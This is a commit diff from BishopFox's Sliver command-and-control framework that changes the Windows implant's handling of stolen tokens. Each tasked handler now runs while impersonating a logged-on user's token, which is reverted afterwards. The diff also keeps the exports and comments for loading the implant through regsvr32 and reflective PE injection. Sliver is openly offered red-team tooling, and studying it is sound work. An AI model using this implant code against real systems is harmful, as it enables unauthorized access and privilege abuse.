improved token management

BishopFox · Nov 9, 2022 · 5e6148b · 5e6148b
1 parent 7b12e89
commit 5e6148b
Show file tree

Hide file tree

Showing 3 changed files with 79 additions and 18 deletions.
diff --git a/implant/sliver/handlers/handlers_windows.go b/implant/sliver/handlers/handlers_windows.go
@@ -24,6 +24,7 @@ import (
 	"fmt"
 	"io"
 	"os"
+	"runtime"
 
 	// {{if .Config.Debug}}
 	"log"
@@ -37,6 +38,7 @@ import (
 	"github.com/bishopfox/sliver/implant/sliver/registry"
 	"github.com/bishopfox/sliver/implant/sliver/service"
 	"github.com/bishopfox/sliver/implant/sliver/spoof"
+	"github.com/bishopfox/sliver/implant/sliver/syscalls"
 	"github.com/bishopfox/sliver/implant/sliver/taskrunner"
 	"github.com/bishopfox/sliver/protobuf/commonpb"
 	"github.com/bishopfox/sliver/protobuf/sliverpb"
@@ -120,6 +122,28 @@ func GetSystemHandlers() map[uint32]RPCHandler {
 	return windowsHandlers
 }
 
+func WrapperHandler(handler RPCHandler, data []byte, resp RPCResponse) {
+	if priv.CurrentToken != 0 {
+		err := syscalls.ImpersonateLoggedOnUser(priv.CurrentToken)
+		if err != nil {
+			// {{if .Config.Debug}}
+			log.Printf("Error: %v\n", err)
+			// {{end}}
+		}
+		runtime.LockOSThread()
+		defer runtime.UnlockOSThread()
+	}
+	handler(data, resp)
+	if priv.CurrentToken != 0 {
+		err := priv.TRevertToSelf()
+		if err != nil {
+			// {{if .Config.Debug}}
+			log.Printf("Error: %v\n", err)
+			// {{end}}
+		}
+	}
+}
+
 // ---------------- Windows Handlers ----------------
 
 func impersonateHandler(data []byte, resp RPCResponse) {

diff --git a/implant/sliver/priv/priv_windows.go b/implant/sliver/priv/priv_windows.go
@@ -96,7 +96,23 @@ func SePrivEnable(s string) error {
 }
 
 func RevertToSelf() error {
+	err := windows.RevertToSelf()
+	if err != nil {
+		// {{if .Config.Debug}}
+		log.Printf("RevertToSelf Error: %v\n", err)
+		// {{end}}
+	}
+	err = windows.CloseHandle(windows.Handle(CurrentToken))
+	if err != nil {
+		// {{if .Config.Debug}}
+		log.Printf("CloseHandle Error: %v\n", err)
+		// {{end}}
+	}
 	CurrentToken = windows.Token(0)
+	return err
+}
+
+func TRevertToSelf() error {
 	return windows.RevertToSelf()
 }
 

diff --git a/implant/sliver/sliver.go b/implant/sliver/sliver.go
@@ -42,17 +42,11 @@ import (
 	"io/ioutil"
 	// {{end}}
 
-	// {{if eq .Config.GOOS "windows"}}
-	"github.com/bishopfox/sliver/implant/sliver/priv"
-	"github.com/bishopfox/sliver/implant/sliver/syscalls"
-
-	// {{end}}
-
 	consts "github.com/bishopfox/sliver/implant/sliver/constants"
 	"github.com/bishopfox/sliver/implant/sliver/handlers"
 	"github.com/bishopfox/sliver/implant/sliver/hostuuid"
-	"github.com/bishopfox/sliver/implant/sliver/locale"
 	"github.com/bishopfox/sliver/implant/sliver/limits"
+	"github.com/bishopfox/sliver/implant/sliver/locale"
 	"github.com/bishopfox/sliver/implant/sliver/pivots"
 	"github.com/bishopfox/sliver/implant/sliver/transports"
 	"github.com/bishopfox/sliver/implant/sliver/version"
@@ -127,6 +121,7 @@ func (serv *sliverService) Execute(args []string, r <-chan svc.ChangeRequest, ch
 var isRunning bool = false
 
 // StartW - Export for shared lib build
+//
 //export StartW
 func StartW() {
 	if !isRunning {
@@ -139,21 +134,25 @@ func StartW() {
 ///~https://github.com/Ne0nd0g/merlin/blob/master/cmd/merlinagentdll/main.go#L65
 
 // VoidFunc is an exported function used with PowerSploit's Invoke-ReflectivePEInjection.ps1
+//
 //export VoidFunc
 func VoidFunc() { main() }
 
 // DllInstall is used when executing the Sliver implant with regsvr32.exe (i.e. regsvr32.exe /s /n /i sliver.dll)
 // https://msdn.microsoft.com/en-us/library/windows/desktop/bb759846(v=vs.85).aspx
+//
 //export DllInstall
 func DllInstall() { main() }
 
 // DllRegisterServer - is used when executing the Sliver implant with regsvr32.exe (i.e. regsvr32.exe /s sliver.dll)
 // https://msdn.microsoft.com/en-us/library/windows/desktop/ms682162(v=vs.85).aspx
+//
 //export DllRegisterServer
 func DllRegisterServer() { main() }
 
 // DllUnregisterServer - is used when executing the Sliver implant with regsvr32.exe (i.e. regsvr32.exe /s /u sliver.dll)
 // https://msdn.microsoft.com/en-us/library/windows/desktop/ms691457(v=vs.85).aspx
+//
 //export DllUnregisterServer
 func DllUnregisterServer() { main() }
 
@@ -409,6 +408,23 @@ func beaconMain(beacon *transports.Beacon, nextCheckin time.Time) error {
 			wg.Add(1)
 			data := task.Data
 			taskID := task.ID
+			// {{if eq .Config.GOOS "windows" }}
+			go handlers.WrapperHandler(handler, data, func(data []byte, err error) {
+				resultsMutex.Lock()
+				defer resultsMutex.Unlock()
+				defer wg.Done()
+				// {{if .Config.Debug}}
+				if err != nil {
+					log.Printf("[beacon] handler function returned an error: %s", err)
+				}
+				log.Printf("[beacon] task completed (id: %d)", taskID)
+				// {{end}}
+				results = append(results, &sliverpb.Envelope{
+					ID:   taskID,
+					Data: data,
+				})
+			})
+			//  {{else}}
 			go handler(data, func(data []byte, err error) {
 				resultsMutex.Lock()
 				defer resultsMutex.Unlock()
@@ -424,6 +440,7 @@ func beaconMain(beacon *transports.Beacon, nextCheckin time.Time) error {
 					Data: data,
 				})
 			})
+			// {{end}}
 		} else if task.Type == sliverpb.MsgOpenSession {
 			go openSessionHandler(task.Data)
 			resultsMutex.Lock()
@@ -566,20 +583,23 @@ func sessionMainLoop(connection *transports.Connection) error {
 			// only applies the token to the calling thread, we need to call it before every task.
 			// It's fucking gross to do that here, but I could not come with a better solution.
 
-			// {{if eq .Config.GOOS "windows" }}
-			if priv.CurrentToken != 0 {
-				err := syscalls.ImpersonateLoggedOnUser(priv.CurrentToken)
-				if err != nil {
-					// {{if .Config.Debug}}
-					log.Printf("Error: %v\n", err)
-					// {{end}}
-				}
-			}
-			// {{end}}
-
 			// {{if .Config.Debug}}
 			log.Printf("[recv] sysHandler %d", envelope.Type)
 			// {{end}}
+
+			// {{if eq .Config.GOOS "windows" }}
+			go handlers.WrapperHandler(handler, envelope.Data, func(data []byte, err error) {
+				// {{if .Config.Debug}}
+				if err != nil {
+					log.Printf("[session] handler function returned an error: %s", err)
+				}
+				// {{end}}
+				connection.Send <- &sliverpb.Envelope{
+					ID:   envelope.ID,
+					Data: data,
+				}
+			})
+			// {{else}}
 			go handler(envelope.Data, func(data []byte, err error) {
 				// {{if .Config.Debug}}
 				if err != nil {
@@ -591,6 +611,7 @@ func sessionMainLoop(connection *transports.Connection) error {
 					Data: data,
 				}
 			})
+			// {{end}}
 		} else if handler, ok := tunHandlers[envelope.Type]; ok {
 			// {{if .Config.Debug}}
 			log.Printf("[recv] tunHandler %d", envelope.Type)